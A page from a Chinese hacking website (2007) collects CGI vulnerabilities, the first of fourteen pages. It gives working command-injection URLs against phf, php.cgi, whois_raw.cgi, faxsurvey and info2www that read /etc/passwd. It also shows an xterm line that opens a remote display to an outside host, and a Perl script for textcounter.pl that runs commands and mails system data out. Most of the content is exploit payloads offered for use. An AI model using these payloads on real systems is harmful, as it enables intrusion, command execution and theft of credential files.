CGI漏洞集锦

日期：2007年8月20日作者：查看:[大字体中字体小字体]

一.phf漏洞
这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示
/etc/passwd:
lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
但是我们还能找到它吗?
二.php.cgi 2.0beta10或更早版本的漏洞=版权所有热点网络热点下载热点网络学院版权所有=
可以读nobody权限的所有文件.
lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在
/etc/master.passwd
/etc/security/passwd等.
三.whois_raw.cgi
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xter
m%20-display%20graziella.lame.org:0
四.faxsurvey
lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
五.textcounter.pl
如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.
#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml'; # please _DO_ _modify_ this
$EMAIL='pdoru@pop3.kappa.ro,root'; # please _DO_ _modify_ this
if ($ARGV[0]) { $CMD=$ARGV[0];}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\mail ${EMAIL} -sanothe
re_one";
}$text="${URL}/;IFS=\8;${CMD};echo";$text =~ s/ /\$\{IFS\}/g;#print "$text\
n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); #如果没有wget命令也可以用lynx
#system({"lynx"} "lynx", $text);
六.一些版本(1.1)的info2www的漏洞
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami asswd)'
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] 下一页
CGI漏洞集锦相关文章：
·显示器工厂模式的进入方法集锦
·软件注册码、安装序列号☆集锦
·你能过关吗?J2EE面试题集锦(附答案)
·管理格言集锦
·MS-SQL开发常用汇总和t-sql技巧集锦
·开始→运行→输入的命令集锦
·创新名言集锦
·JavaScript经典效果集锦
·著名公司面试考题集锦
·智慧火花、智慧名言名句集锦
CGI漏洞集锦相关软件
·对联集锦 V10.0
·世界摩托车锦标赛3
·花营锦阵
·趣味智力问题集锦
·免费软件集锦 V1.0
·读相声-精品相声段子集锦
·《世界花式台球锦标赛2004》免CD补丁
·汇锦国际酒店管理系统 V6.1.01 网络版
·世界花式台球锦标赛2004
·ASP与DHTML资料集锦

上一篇:主页木马的制作方法

下一篇:SNMP漏洞威胁网络安全

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

CGI漏洞集锦

精品推荐

热点TOP10

特别推荐